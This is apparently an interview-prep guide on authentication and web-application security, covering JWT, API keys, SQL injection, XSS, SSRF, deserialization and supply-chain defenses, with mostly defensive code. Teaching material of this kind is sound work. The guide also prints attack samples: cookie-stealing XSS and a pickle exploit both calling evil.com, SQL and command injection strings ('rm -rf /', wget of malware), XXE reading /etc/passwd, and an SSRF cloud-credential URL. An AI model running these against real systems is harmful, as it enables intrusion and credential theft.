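To make the structure concrete, here is a standard-library sketch of HS256 signing and verification. It is for illustration only; in production, use a maintained library such as PyJWT as shown above. The helper names are hypothetical, and aud is simplified to a single string:

```python
import base64
import hashlib
import hmac
import json
import time


def b64url_encode(data: bytes) -> str:
    return base64.urlsafe_b64encode(data).rstrip(b"=").decode("ascii")


def b64url_decode(segment: str) -> bytes:
    return base64.urlsafe_b64decode(segment + "=" * (-len(segment) % 4))


def hs256_encode(payload: dict, secret: bytes) -> str:
    """header.payload.signature, signature = HMAC-SHA256 over the first two parts."""
    header = {"alg": "HS256", "typ": "JWT"}
    signing_input = ".".join(
        b64url_encode(json.dumps(part, separators=(",", ":")).encode("utf-8"))
        for part in (header, payload)
    )
    signature = hmac.new(secret, signing_input.encode("ascii"), hashlib.sha256).digest()
    return f"{signing_input}.{b64url_encode(signature)}"


def hs256_decode(token: str, secret: bytes, audience: str, issuer: str) -> dict:
    header_b64, payload_b64, sig_b64 = token.split(".")  # ValueError if not 3 parts
    header = json.loads(b64url_decode(header_b64))
    # Enforce the expected algorithm server-side; "none" or anything else is rejected
    if header.get("alg") != "HS256":
        raise ValueError(f"unexpected alg {header.get('alg')!r}")
    expected = hmac.new(secret, f"{header_b64}.{payload_b64}".encode("ascii"),
                        hashlib.sha256).digest()
    if not hmac.compare_digest(expected, b64url_decode(sig_b64)):
        raise ValueError("bad signature")
    claims = json.loads(b64url_decode(payload_b64))
    now = time.time()
    if not isinstance(claims.get("exp"), (int, float)) or claims["exp"] <= now:
        raise ValueError("missing or expired exp")
    if claims.get("nbf", 0) > now:
        raise ValueError("token not yet valid")
    if claims.get("iss") != issuer or claims.get("aud") != audience:
        raise ValueError("wrong issuer or audience")
    return claims
```

The alg check runs before any signature work, so a token whose header says "none" is rejected outright rather than trusted.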

2What is the "alg:none" JWT vulnerability? What other algorithm confusion attacks exist?

These are among the most famous JWT vulnerabilities — real bugs found in many libraries and applications.

1. alg:none attack:

# Attacker modifies JWT header to alg:"none"
# Strips the signature
# Vulnerable libraries accept unsigned tokens!
# {"alg": "none", "typ": "JWT"}.{"sub": "admin"}.  ← no signature!

# Fix: ALWAYS specify allowed algorithms explicitly in your verification:
jwt.decode(token, key, algorithms=["RS256"])  # NEVER algorithms=["none"]
# Never trust the header's algorithm — always enforce server-side

2. RS256 → HS256 confusion attack:

# Server uses RS256 (asymmetric). Public key is, well, public.
# Attacker changes header to alg:"HS256"
# Attacker signs token with HMAC using the server's PUBLIC KEY as the HMAC secret
# Vulnerable server: "HS256? Let me verify with my configured key..." (which is the public key)
# → Token accepted!

# Attack works when server naively uses "configured key" regardless of algorithm.
# Fix: strict algorithm enforcement — if you expect RS256, reject anything else.
# Never allow the caller to specify which algorithm to use for verification.

3. Key confusion in multi-tenant systems: Using the same JWT secret across tenants. A token issued for tenant A could be accepted by tenant B's API. Fix: include tenant ID in the JWT and validate it against the authenticated tenant context.

4. kid (Key ID) injection: Vulnerable servers use the kid header to fetch the verification key from a database. Attacker sets kid to an SQL injection payload or a path to a predictable file. Fix: treat kid as untrusted input — whitelist valid key IDs, never construct SQL/file paths from kid.

3What should and shouldn't go in JWT claims? What are common design mistakes?

JWTs are self-contained — the token itself carries all necessary information without a database lookup. This is powerful but has trade-offs.

Good candidates for JWT claims:

User ID (sub), issuer (iss), audience (aud), expiry (exp)
Roles or scopes for the current session
Tenant ID for multi-tenant systems
Session ID (for revocation capability)

What NOT to put in JWTs:

Sensitive data: JWTs are Base64-encoded, not encrypted. Anyone with the token can read the payload. No passwords, SSNs, credit card numbers, medical data.
Data that changes frequently: User's email, roles, subscription tier. The token is a snapshot — stale data remains valid until expiry. Use short TTLs or opaque tokens with database lookup if staleness is unacceptable.
Large payloads: JWTs are sent in every request header. 10KB JWTs add significant overhead. Keep payloads small.

# JWE (JSON Web Encryption) — if you must put sensitive data:
# header.encrypted_key.iv.ciphertext.tag
# Payload encrypted with a random content-encryption key (CEK); the CEK itself is encrypted for the recipient (e.g., with their public key)
# Much heavier — only use when truly needed

# The "stateless vs revocability" dilemma:
# Pure JWT: no database lookup, can't revoke individual tokens
# Solution: keep JWTs short-lived (15 min), use refresh tokens (can revoke)
# For immediate revocation: maintain a small denylist of revoked JTI (JWT IDs)
# — much smaller than a full session store

4Where should you store JWTs in a web application? Compare localStorage vs httpOnly cookies.

Storage location determines the attack surface — this is one of the most debated security questions in frontend development.

localStorage / sessionStorage:

Any JavaScript on the page can read it — XSS attack = token theft
Persistent across tabs and browser restarts (localStorage)
Easy to implement for SPAs with REST APIs
Verdict: Acceptable only if XSS is thoroughly prevented (CSP, output encoding, no user-controlled JS). Not recommended for high-security applications.

HttpOnly cookies:

JavaScript cannot read HttpOnly cookies — XSS cannot steal the token
Browser sends automatically — no JS needed to attach to requests
Vulnerable to CSRF — must pair with SameSite=Strict/Lax or CSRF tokens
Verdict: Recommended for most applications — better XSS resilience

# Recommended configuration:
Set-Cookie: access_token={access_token}; HttpOnly; Secure; SameSite=Lax; Path=/api; Max-Age=900
Set-Cookie: refresh_token={refresh_token}; HttpOnly; Secure; SameSite=Strict; Path=/auth/refresh; Max-Age=2592000

# BFF (Backend for Frontend) pattern:
# SPA calls a BFF server (same origin) via session cookie
# BFF holds the actual access token server-side
# BFF calls downstream APIs using the access token
# Token never touches the browser at all — most secure approach
# Commonly built with server-side session handling, e.g., Next.js with an auth library such as Auth.js
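The two Set-Cookie values from the recommended configuration can be produced with the standard library's http.cookies module (SameSite support requires Python 3.8+). A sketch; the function name is hypothetical:

```python
from http.cookies import SimpleCookie


def auth_cookie_headers(access_token: str, refresh_token: str) -> list:
    """Build the two Set-Cookie header values with the recommended attributes."""
    cookies = SimpleCookie()
    cookies["access_token"] = access_token
    cookies["access_token"].update(
        {"httponly": True, "secure": True, "samesite": "Lax",
         "path": "/api", "max-age": 900}
    )
    cookies["refresh_token"] = refresh_token
    cookies["refresh_token"].update(
        {"httponly": True, "secure": True, "samesite": "Strict",
         "path": "/auth/refresh", "max-age": 2592000}  # 30 days
    )
    return [morsel.OutputString() for morsel in cookies.values()]
```

Scoping the refresh cookie to /auth/refresh means the browser sends it only to the refresh endpoint, not with every API call.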

5What is token introspection and how do you handle JWT revocation at scale?

# The revocation problem:
# JWTs are stateless — once issued, valid until exp
# Even after logout/password change, the token is still cryptographically valid
# How to invalidate?

# Strategy 1: Short TTL (simplest)
# Access tokens expire in 5-15 minutes
# User "logout" = delete token client-side + revoke refresh token
# Rogue token window = at most 15 minutes

# Strategy 2: JWT Denylist (for immediate revocation)
# Store revoked JTI (JWT ID) in Redis with TTL = token's remaining lifetime
import redis
r = redis.Redis()

def revoke_token(jti, remaining_ttl):
    r.setex(f"revoked:{jti}", remaining_ttl, "1")

def is_revoked(jti):
    return r.exists(f"revoked:{jti}")

def validate_jwt(token):
    claims = jwt.decode(token, ...)  # signature, exp, etc.
    if is_revoked(claims["jti"]):
        raise TokenRevokedException()
    return claims
# Only revoked tokens in the set — much smaller than full session store
# Automatically cleaned up via TTL when tokens expire

# Strategy 3: Token generation counter
# Store per-user counter in DB: users.token_generation = 7
# Include in JWT: {"gen": 7}
# On revoke-all: increment counter to 8
# On validation: reject if token.gen < current_generation
# Single DB read per request — scalable, handles "logout all devices"

# Strategy 4: Versioned tokens
# Similar to generation counter but per-device/session
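Strategy 3 can be sketched in a few lines. This uses an in-memory dict as a stand-in for the users.token_generation column; the class and method names are hypothetical, and token signing is omitted:

```python
class TokenGenerations:
    """Per-user generation counter; in-memory stand-in for a database column."""

    def __init__(self):
        self._gen = {}

    def current(self, user_id: str) -> int:
        return self._gen.get(user_id, 0)

    def revoke_all(self, user_id: str) -> None:
        """'Log out all devices': bump the counter so every older token fails."""
        self._gen[user_id] = self.current(user_id) + 1

    def claims_for(self, user_id: str) -> dict:
        """Claims to embed when minting a new token."""
        return {"sub": user_id, "gen": self.current(user_id)}

    def is_current(self, claims: dict) -> bool:
        """Reject tokens minted before the last revoke_all (or lacking gen)."""
        return claims.get("gen", -1) >= self.current(claims["sub"])
```

The lookup is a single integer per user, so it caches well; the trade-off is that it revokes all of a user's tokens at once rather than one specific token.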

6How do you design API key authentication? What are best practices for key generation, storage, and rotation?

# API key format best practices:
import secrets, hashlib

# Include a prefix for scanning tools to detect leaks:
def generate_api_key():
    key = secrets.token_urlsafe(32)   # 256 bits of entropy
    return f"sk_{key}"               # prefix identifies the key type

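# Store ONLY a hash in the database; if the DB is compromised, keys aren't exposed.
# A fast unsalted SHA-256 is acceptable here (unlike passwords) because the key has 256 bits of entropy: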
def store_api_key(raw_key, user_id, name):
    key_hash = hashlib.sha256(raw_key.encode()).hexdigest()
    db.execute("""
        INSERT INTO api_keys (hash, user_id, name, created_at, last_used_at)
        VALUES ($1, $2, $3, NOW(), NULL)
    """, key_hash, user_id, name)
    # Show raw_key to user ONCE — never store or show again

def validate_api_key(raw_key):
    key_hash = hashlib.sha256(raw_key.encode()).hexdigest()
    key = db.query("SELECT * FROM api_keys WHERE hash = $1", key_hash)
    if not key: raise UnauthorizedException()
    db.execute("UPDATE api_keys SET last_used_at = NOW() WHERE id = $1", key.id)
    return key

# Key rotation without downtime:
# 1. Generate new key, show to user
# 2. Both old and new key work during transition period
# 3. User updates their integrations to use new key
# 4. After grace period, revoke old key

# Scoped keys: read-only, write, admin — limit blast radius
# Key expiry: force periodic rotation
# Rate limiting per key: prevent abuse
# Audit log: every API call logged with which key was used

7What is the difference between opaque tokens and structured tokens (JWT)? When do you choose each?

Opaque tokens: Random strings with no inherent meaning. Validated by calling the authorization server's introspection endpoint. The token itself contains no data.

JWT (structured tokens): Self-contained, signed tokens carrying claims. Validated locally using the issuer's public key. No network call required per request.

# Comparison:
# Opaque tokens:
# ✅ Revocable instantly (lookup by token → delete row)
# ✅ Sensitive data never leaves the auth server
# ✅ Token size: tiny (just a random ID)
# ❌ Network call to auth server for every validation (latency, availability dependency)

# JWT tokens:
# ✅ Stateless validation — no network call needed, scales horizontally
# ✅ Works offline/disconnected systems
# ❌ Cannot revoke individual tokens (only short TTL helps)
# ❌ Claims can be stale until token expires
# ❌ Larger size (headers on every request)

# When to use opaque:
# When immediate revocation is required (financial, healthcare)
# When you want to hide user data from intermediaries
# Internal microservice tokens where you control all parties

# When to use JWT:
# Third-party APIs you don't control (can't call your auth server)
# Horizontally scaled services needing stateless validation
# Short-lived tokens (15 min) where revocation window is acceptable
# Cross-service tokens within a trusted service mesh

# Hybrid approach (common in practice):
# Refresh tokens: opaque (stored in DB, revocable instantly)
# Access tokens: JWT (short-lived, stateless validation)
# Best of both: quick revocation via refresh token, fast access token validation

Web Application Security (OWASP)

10 questions

1What is SQL injection and how do you prevent it? Why do parameterized queries work?

SQL injection occurs when user-supplied input is concatenated into SQL queries, allowing attackers to modify the query's logic. Injection is still in the OWASP Top 10: it is A03 in the 2021 edition, after holding the #1 spot in 2017.

# VULNERABLE — string interpolation:
username = request.form["username"]
query = f"SELECT * FROM users WHERE username = '{username}'"
# Input: ' OR '1'='1' --
# Query becomes: SELECT * FROM users WHERE username = '' OR '1'='1' --'
# Returns all users! Attacker is authenticated as first user.
# Worse (where the driver allows stacked queries): ' ; DROP TABLE users --

# SAFE — parameterized queries (prepared statements):
cursor.execute("SELECT * FROM users WHERE username = %s", (username,))
# The DB driver sends query and parameters SEPARATELY
# Database parses the SQL structure first, then substitutes parameters as data
# Parameters CANNOT change query structure — they're always treated as values

# ORMs are also safe by default (when used correctly):
User.query.filter_by(username=username).first()  # SQLAlchemy — safe
# UNSAFE even with ORM — raw SQL with format strings:
db.execute(f"SELECT * FROM users WHERE name = '{name}'")  # still injectable!

# Other injection types — same principle:
# NoSQL injection: {"username": {"$gt": ""}} in MongoDB
# LDAP injection: )(uid=*))(|(uid=*
# OS command injection: os.system(f"convert {filename}.png")  ← ; rm -rf /
# XXE injection in XML parsers

# Defense in depth:
# 1. Parameterized queries ALWAYS (primary defense)
# 2. Input validation (whitelist expected format)
# 3. Least-privilege DB user (no DROP, no admin)
# 4. WAF to detect/block injection patterns
# 5. Error handling — never expose DB errors to users
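The difference is easy to see with Python's built-in sqlite3 module against an in-memory database (table and data are made up for the demo). Note that sqlite3 uses ? placeholders rather than %s; the placeholder style depends on the driver:

```python
import sqlite3

conn = sqlite3.connect(":memory:")
conn.execute("CREATE TABLE users (id INTEGER PRIMARY KEY, username TEXT)")
conn.executemany("INSERT INTO users (username) VALUES (?)", [("alice",), ("bob",)])

payload = "' OR '1'='1' --"

# VULNERABLE: the payload becomes part of the SQL text itself
unsafe_sql = f"SELECT username FROM users WHERE username = '{payload}'"
print(conn.execute(unsafe_sql).fetchall())  # every row comes back

# SAFE: the value is bound separately and compared as plain data
safe_rows = conn.execute(
    "SELECT username FROM users WHERE username = ?", (payload,)
).fetchall()
print(safe_rows)  # []
```

In the safe query, the whole payload is just an unusual username that no row matches.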

2What is XSS (Cross-Site Scripting)? Compare stored, reflected, and DOM-based XSS and defenses.

XSS allows attackers to inject malicious scripts into web pages viewed by other users. The injected script runs in the victim's browser with the same origin as the target site.

Stored XSS: Malicious script persisted in the database. Every user who views the content gets the script. Highest impact.

Reflected XSS: Script in the URL/request, reflected back in the response. Victim must click a crafted link.

DOM-based XSS: The payload comes from a client-side source (often the URL fragment) and client-side JavaScript writes it into a dangerous sink. Fragments are never sent to the server, so server-side sanitization can't catch it.

# VULNERABLE — rendering user input as HTML:
# Template: {{comment}}  (unescaped)
# Input: <script>new Image().src='https://evil.com/?c='+document.cookie</script>
# → Steals session cookies, exfiltrates data, defaces page, keylogging

# Defense 1: Context-aware output encoding (primary defense)
import html
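safe = html.escape(user_input)           # HTML context: & → &amp;  < → &lt;  > → &gt;  " → &quot;  ' → &#x27;
# URL context:  urllib.parse.quote(user_input, safe="")
# JS context:   json.dumps(user_input), also escaping <, > and & inside <script>; never concatenate into JS strings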

# Defense 2: Content Security Policy (CSP)
Content-Security-Policy: default-src 'self';
  script-src 'self' 'nonce-{random}';     # only scripts with this nonce run
  img-src 'self' data:;
  style-src 'self' 'unsafe-inline';
  frame-ancestors 'none';                  # clickjacking protection

# Defense 3: Trusted Types API (modern browsers)
# Requires all DOM manipulations to go through a typed API
# Blocks innerHTML assignments with raw strings

# Defense 4: HttpOnly cookies
# XSS can't steal HttpOnly cookies via document.cookie
# Limits the damage (but XSS can still perform actions on behalf of user)

# DOM XSS — sources and sinks:
# Sources (attacker-controlled): location.hash, location.search, document.referrer
# Sinks (dangerous): innerHTML, document.write, eval(), setTimeout(string)
# Safe: textContent, innerText, setAttribute for non-event attributes
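Each context needs its own encoder. A standard-library sketch of the three encoders named in Defense 1 (helper names are hypothetical). Note that json.dumps by itself does not escape <, so data placed inside an inline script block also needs <, > and & escaped:

```python
import html
import json
from urllib.parse import quote


def html_text(value: str) -> str:
    """HTML body or quoted-attribute context: escapes & < > " and '."""
    return html.escape(value, quote=True)


def url_param(value: str) -> str:
    """URL query-parameter context: percent-encode everything outside the unreserved set."""
    return quote(value, safe="")


def script_json(value) -> str:
    """Data embedded in an inline script block.

    A value containing '</script>' would end the script element, so <, > and &
    are replaced with JSON unicode escapes; the result is still valid JSON/JS.
    """
    return (json.dumps(value)
            .replace("<", "\\u003c")
            .replace(">", "\\u003e")
            .replace("&", "\\u0026"))
```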

3What is SSRF (Server-Side Request Forgery) and why is it especially dangerous in cloud environments?

SSRF tricks the server into making requests to internal/unintended destinations. The request comes from the server — bypassing firewall rules that protect internal services from external access.

# Vulnerable code — user-controlled URL fetch:
url = request.args.get("url")
response = requests.get(url)              # fetches whatever URL the user provides!

# Attack 1: Internal services
# url = http://internal-db:5432/admin
# url = http://10.0.0.1/admin

# Attack 2: Cloud metadata (most critical)
# AWS IMDSv1 — no auth required:
# url = http://169.254.169.254/latest/meta-data/iam/security-credentials/MyRole
# Returns temporary AWS credentials! Attacker gets full IAM role access.
# Capital One breach (2019): SSRF → metadata service → IAM credentials → S3 bucket access

# Attack 3: Internal services via DNS rebinding
# DNS resolves to permitted IP initially, then to 169.254.169.254 after check

# Defenses:
# 1. Block requests to private IP ranges and metadata endpoints:
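import ipaddress, socket, urllib.parse

def is_safe_url(url):
    parsed = urllib.parse.urlparse(url)
    if parsed.scheme not in ("http", "https") or not parsed.hostname:
        return False
    try:
        infos = socket.getaddrinfo(parsed.hostname, None)
    except socket.gaierror:
        return False
    # Check EVERY resolved address, IPv4 and IPv6, not just the first A record
    for *_, sockaddr in infos:
        ip = ipaddress.ip_address(sockaddr[0].split("%")[0])  # drop IPv6 zone id
        if ip.version == 6 and ip.ipv4_mapped:                # e.g. ::ffff:169.254.169.254
            ip = ip.ipv4_mapped
        # Not global: 10/8, 172.16/12, 192.168/16, 127/8, 169.254/16 (metadata), ::1, fc00::/7...
        if not ip.is_global or ip.is_multicast:
            return False
    return True  # only meaningful if the request then connects to this same IP (see 4)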

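# 2. AWS IMDSv2: requests need a session token obtained via an HTTP PUT with a custom header:
# aws ec2 modify-instance-metadata-options --instance-id {instance_id} --http-tokens required
# Most SSRF bugs can only send GETs to an attacker-chosen URL, so they can't obtain the token (harder, not impossible)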

# 3. Allowlist approach: only fetch from permitted domains
# 4. Resolve once, validate the IP, then connect to that same IP (pin it); re-resolving at request time can return a rebound address (TOCTOU fix)

4What is insecure deserialization? Why is deserializing untrusted data dangerous?

Deserialization converts data from a storable/transmittable format back into an object. If the format is binary (Pickle, Java ObjectInputStream, PHP unserialize) and includes class information, an attacker can craft malicious payloads that execute arbitrary code when deserialized — a Remote Code Execution (RCE) vulnerability.

# Python pickle — NEVER deserialize untrusted data:
import base64, os, pickle
# Safe: pickle.dumps(your_data)
# DANGEROUS:
data = base64.b64decode(user_cookie)
obj = pickle.loads(data)   # calls whatever callable the stream references (via __reduce__)!

# Malicious pickle payload:
class Exploit:
    def __reduce__(self):
        return (os.system, ("curl https://evil.com/$(whoami)",))
# pickle.loads(pickle.dumps(Exploit())) → executes the command!

# Java deserialization gadget chains:
# Apache Commons Collections + Java ObjectInputStream → RCE
# Used in attacks against WebLogic, JBoss, Jenkins, etc.

# Safe alternatives:
# Use JSON/MessagePack/Protobuf — only data, no code execution
# If you must use binary serialization, sign the data with HMAC before storing
# Verify HMAC before deserializing:
import hmac, hashlib
def safe_deserialize(payload, secret):
    data, sig = payload[:-32], payload[-32:]
    expected = hmac.new(secret, data, hashlib.sha256).digest()
    if not hmac.compare_digest(expected, sig):
        raise ValueError("Invalid signature")
    return pickle.loads(data)  # verified as our own data; a leaked secret still means RCE

# Flask's signed session cookies (via itsdangerous) apply the same sign-then-verify idea,
# but serialize with JSON rather than pickle: cookie = base64(json_data).timestamp.HMAC-SHA1 signature

5What are security headers? Explain CSP, HSTS, X-Frame-Options, and others.

# HSTS (HTTP Strict Transport Security):
Strict-Transport-Security: max-age=63072000; includeSubDomains; preload
# Tells browser: only connect via HTTPS for the next 2 years
# Prevents SSL stripping attacks (MITM downgrades HTTPS → HTTP)
# preload: submit to browser preload lists — enforced before first visit

# Content-Security-Policy (CSP): controls resource loading
Content-Security-Policy:
  default-src 'self';                   # default: only same-origin
  script-src 'self' 'nonce-{random}';   # scripts must have matching nonce
  img-src 'self' https://cdn.example.com data:;
  connect-src 'self' https://api.example.com;
  font-src 'self' https://fonts.gstatic.com;     # Google Fonts serves font files from gstatic (its CSS comes from fonts.googleapis.com)
  frame-ancestors 'none';               # prevents embedding in iframes
  upgrade-insecure-requests;            # auto-upgrade HTTP → HTTPS
  report-uri /csp-report;              # report violations (deprecated in favor of report-to, still widely supported)

# X-Frame-Options (superseded by CSP frame-ancestors, but still good):
X-Frame-Options: DENY               # prevents all iframe embedding
X-Frame-Options: SAMEORIGIN         # only same-origin can embed

# X-Content-Type-Options:
X-Content-Type-Options: nosniff
# Prevents browser MIME type sniffing — executes files only as declared Content-Type
# Without this: upload a .jpg containing HTML, browser might execute it

# Referrer-Policy:
Referrer-Policy: strict-origin-when-cross-origin
# Full URL for same-origin requests, only the origin for cross-origin requests, nothing on HTTPS → HTTP

# Permissions-Policy (formerly Feature-Policy):
Permissions-Policy: camera=(), microphone=(), geolocation=()
# Opt out of browser APIs you don't use — reduce attack surface

# Cross-Origin headers (CORP/COEP/COOP):
Cross-Origin-Resource-Policy: same-origin
Cross-Origin-Embedder-Policy: require-corp
Cross-Origin-Opener-Policy: same-origin
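# COOP same-origin + COEP require-corp make the page "cross-origin isolated", which browsers
# require before enabling SharedArrayBuffer and high-resolution timers (Spectre mitigations);
# CORP lets a resource restrict which origins may load it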
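The 'nonce-{random}' placeholder in the CSP examples must be a fresh, unpredictable value for every response. A minimal sketch of generating it alongside a few of the headers above; the function name and the initApp() call are hypothetical, and wiring the headers into a framework's response object is left out:

```python
import secrets


def csp_nonce_headers():
    """Return (nonce, headers) for ONE response; never reuse a nonce across responses."""
    nonce = secrets.token_urlsafe(16)  # 128 bits of randomness, base64url characters
    headers = {
        "Content-Security-Policy": (
            f"default-src 'self'; script-src 'self' 'nonce-{nonce}'; "
            "frame-ancestors 'none'"
        ),
        "Strict-Transport-Security": "max-age=63072000; includeSubDomains; preload",
        "X-Content-Type-Options": "nosniff",
        "Referrer-Policy": "strict-origin-when-cross-origin",
    }
    return nonce, headers


nonce, headers = csp_nonce_headers()
# Only script tags carrying this response's nonce will execute
page = f'<script nonce="{nonce}">initApp()</script>'
```

A fixed or guessable nonce defeats the policy, because an injected script tag could simply carry the same value.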

6What is path traversal and what other injection vulnerabilities should senior engineers know?

# Path traversal:
filename = request.args.get("file")
path = f"/app/uploads/{filename}"
return open(path).read()
# Attack: filename = "../../../../etc/passwd"
# Fix: resolve the canonical path and verify it stays inside the intended base
import os
base = os.path.realpath("/app/uploads")             # canonicalize the base too (symlinks)
safe_path = os.path.realpath(os.path.join(base, filename))
if not safe_path.startswith(base + os.sep):
    raise PermissionError("Path traversal detected")
return open(safe_path).read()

# Command injection:
os.system(f"convert {user_input} output.png")
# Attack: ; rm -rf / or $(wget evil.com/malware)
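# Fix: use subprocess with list args (no shell), so ; and $() are passed literally:
import subprocess
subprocess.run(["convert", user_input, "output.png"], check=True)
# Still validate user_input: a value starting with "-" is parsed as an option (argument injection)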

# XXE (XML External Entity):
from lxml import etree
parser = etree.XMLParser(resolve_entities=True)   # VULNERABLE
tree = etree.parse(user_xml, parser)
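# Attack payload:
# <?xml version="1.0"?>
# <!DOCTYPE foo [<!ENTITY xxe SYSTEM "file:///etc/passwd">]>
# <foo>&xxe;</foo>  ← reads /etc/passwd

# Safe XML parsing: no entity expansion, no external DTD loading, no network access
parser = etree.XMLParser(resolve_entities=False, load_dtd=False, no_network=True)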

# Template injection (SSTI):
from jinja2 import Template
template = Template(user_input)   # NEVER render user input as a template!
# Attack: {{config.items()}} or {{''.__class__.__mro__[1].__subclasses__()}}
# Fix: user data goes into template CONTEXT, not as the template itself
Template("Hello, {{ name }}!").render(name=user_input)  # safe
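The same containment check as the path traversal fix above can be written with pathlib. This is a sketch assuming Python 3.9+ for Path.is_relative_to. The helper name safe_join is hypothetical. It canonicalizes both paths, then rejects anything that resolves outside the base directory, including absolute paths and symlink escapes.

```python
from pathlib import Path


def safe_join(base_dir: str, user_path: str) -> Path:
    """Resolve user_path under base_dir, refusing anything that escapes it."""
    base = Path(base_dir).resolve()
    # resolve() collapses ".." segments and follows symlinks; an absolute
    # user_path replaces the base entirely, which the check below then rejects
    candidate = (base / user_path).resolve()
    if not candidate.is_relative_to(base):
        raise PermissionError(f"path traversal blocked: {user_path!r}")
    return candidate
```

Comparing path components with is_relative_to avoids the string-prefix pitfall where "/app/uploads_evil" would pass a naive startswith("/app/uploads") check.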

7What is insecure direct object reference (IDOR)? How do you prevent broken object-level authorization?

IDOR (called BOLA, Broken Object Level Authorization, in API contexts) is ranked #1 in the OWASP API Security Top 10 (both the 2019 and 2023 editions). An attacker simply changes an ID parameter in a request to access another user's data.

# VULNERABLE — no authorization check:
@app.get("/api/orders/{order_id}")
def get_order(order_id: int, user=Depends(get_current_user)):
    order = db.query(Order).filter(Order.id == order_id).first()
    return order  # ← any authenticated user can access any order!

# SECURE — always filter by current user:
@app.get("/api/orders/{order_id}")
def get_order(order_id: int, user=Depends(get_current_user)):
    order = db.query(Order).filter(
        Order.id == order_id,
        Order.user_id == user.id      # ← must own this order
    ).first()
    if not order: raise HTTPException(404)  # 404, not 403 — don't leak existence
    return order

# For admin access: explicit role check first:
@app.get("/api/admin/orders/{order_id}")
def admin_get_order(order_id: int, user=Depends(require_admin)):
    return db.query(Order).filter(Order.id == order_id).first()

# Additional mitigations:
# Use UUIDs instead of sequential IDs — harder to enumerate
# (but not a substitute for proper auth — security through obscurity alone is not enough)

# Policy-based authorization with OPA/Cedar:
# is_authorized(user, "orders:read", order) → true/false
# Centralize authorization logic — every endpoint checks the policy

Testing for IDOR: Create two accounts and perform an action with account A. Capture the request, then replay it with account B's session but account A's IDs. If B can access A's data, it's an IDOR. Burp Suite (Intruder, or the Autorize extension) and OWASP ZAP can automate this replay.
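The two-account replay can also run as an automated regression test. Below is a self-contained sketch. It assumes a hypothetical in-memory ORDERS store in place of the real database, and get_order_for_user and idor_probe are illustrative names. The probe replays every object owned by one user under another user's identity and reports anything that leaks.

```python
from dataclasses import dataclass


@dataclass
class Order:
    id: int
    user_id: int
    item: str


class NotFound(Exception):
    pass


# Hypothetical in-memory store standing in for the real database
ORDERS = {1: Order(1, user_id=100, item="laptop"), 2: Order(2, user_id=200, item="phone")}


def get_order_for_user(order_id: int, current_user_id: int) -> Order:
    order = ORDERS.get(order_id)
    # "Exists but belongs to someone else" is indistinguishable from "does not exist"
    if order is None or order.user_id != current_user_id:
        raise NotFound(order_id)
    return order


def idor_probe(owner_id: int, attacker_id: int) -> list[int]:
    """Replay every object owned by owner_id as attacker_id; return IDs that leaked."""
    leaked = []
    for oid, order in ORDERS.items():
        if order.user_id != owner_id:
            continue
        try:
            get_order_for_user(oid, attacker_id)
            leaked.append(oid)
        except NotFound:
            pass
    return leaked
```

In a real suite, the probe would send HTTP requests with two test users' sessions instead of calling the function directly, and the test would fail whenever the leaked list is non-empty.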

8What are supply chain attacks? How do you defend against dependency confusion and typosquatting?

Supply chain attacks target the development and build process rather than the running application. If a malicious package gets into your build, the attacker's code runs in your production environment.

Dependency confusion (Alex Birsan, 2021): If your package manager resolves a name against both public and private registries and prefers the highest version, an attacker can publish a malicious package to npm/PyPI with the same name as your internal package but a higher version number. The build system then installs the attacker's public version.

# Fix for npm: use scoped packages and enforce scope registry in .npmrc:
@mycompany:registry=https://my.private.registry.com
always-auth=true
# Scoped packages (@mycompany/auth) resolve only from the configured registry;
# also claim the @mycompany scope on npmjs.com so nobody else can publish under it

# Fix for pip: --index-url (replaces default) vs --extra-index-url (adds to defaults)
pip install --index-url https://my.private.pypi.com/simple/ mypackage
# NOT: pip install --extra-index-url (still checks public PyPI — vulnerable!)

Typosquatting: Malicious packages with names similar to popular ones, e.g. colourama (vs colorama) or python3-dateutil (vs python-dateutil).

Defenses:

Lock files: package-lock.json, poetry.lock, Cargo.lock — pin exact versions AND checksums
Dependency auditing: npm audit, pip-audit, Dependabot, and Snyk alert on known CVEs
SBOM (Software Bill of Materials): inventory of all dependencies for auditing
Sigstore/sigsum: cryptographic signing of packages and build artifacts
Reproducible builds: same source → same binary, bit-for-bit — detect tampering
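Lock-file checksums protect you only if the installer compares them before using an artifact. pip does this in hash-checking mode, with a line such as package==1.2.3 --hash=sha256:<digest> plus pip install --require-hashes -r requirements.txt. The sketch below shows the underlying check for any downloaded artifact. The helper names are hypothetical.

```python
import hashlib


def sha256_of(path: str, chunk_size: int = 1 << 16) -> str:
    """Stream a file through SHA-256 so large artifacts don't need to fit in memory."""
    digest = hashlib.sha256()
    with open(path, "rb") as f:
        for chunk in iter(lambda: f.read(chunk_size), b""):
            digest.update(chunk)
    return digest.hexdigest()


def verify_artifact(path: str, pinned_sha256: str) -> None:
    """Refuse an artifact whose digest differs from the value pinned in the lock file."""
    actual = sha256_of(path)
    if actual != pinned_sha256.lower():
        raise ValueError(f"checksum mismatch for {path}: got {actual}, pinned {pinned_sha256}")
```

A matching hash proves that the bytes are the ones you pinned, not that they are benign. Pinning defends against later tampering or a swapped upload, while auditing and signing address whether the pinned version was trustworthy in the first place.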

9What is rate limiting and how do you implement it to prevent brute force and DoS?

# Rate limiting for authentication endpoints:
import redis, time
r = redis.Redis()

def rate_limit_login(identifier, max_attempts=5, window_seconds=900):
    """Allow max_attempts per user/IP per 15-minute fixed window; block for the rest of it."""
    key = f"login_attempts:{identifier}"
    attempts = r.incr(key)
    # First attempt starts the window. INCR + EXPIRE are two commands (not atomic):
    # use a MULTI/EXEC pipeline or a Lua script in production
    if attempts == 1: r.expire(key, window_seconds)
    if attempts > max_attempts:
        ttl = r.ttl(key)
        raise RateLimitError(f"Too many attempts. Try again in {ttl} seconds.")  # app-defined error
    return max_attempts - attempts  # remaining attempts

# Preventing user enumeration via timing (same work whether or not the user exists):
def login_with_delay(username, password):
    user = db.get_user_by_email(username)
    if user:
        correct = verify_password(password, user.password_hash)
    else:
        # Always run the hash even if the user doesn't exist, so response time doesn't
        # reveal valid usernames (dummy_hash: a precomputed hash of a random string)
        verify_password(password, dummy_hash)
        correct = False
    if not correct: raise AuthenticationError()
    return create_session(user)

# Fixed-window counter for API rate limiting (one Redis key per window):
def check_api_rate_limit(api_key, limit=100, window=60):
    window_id = int(time.time() // window)
    key = f"rate:{api_key}:{window_id}"
    count = r.incr(key)
    if count == 1: r.expire(key, window * 2)  # old windows expire on their own
    reset_at = (window_id + 1) * window       # epoch second when this window ends

    # Return standard headers with every response:
    headers = {
        "X-RateLimit-Limit": str(limit),
        "X-RateLimit-Remaining": str(max(0, limit - count)),
        "X-RateLimit-Reset": str(reset_at),
    }
    if count > limit:  # caller responds 429 Too Many Requests with these headers
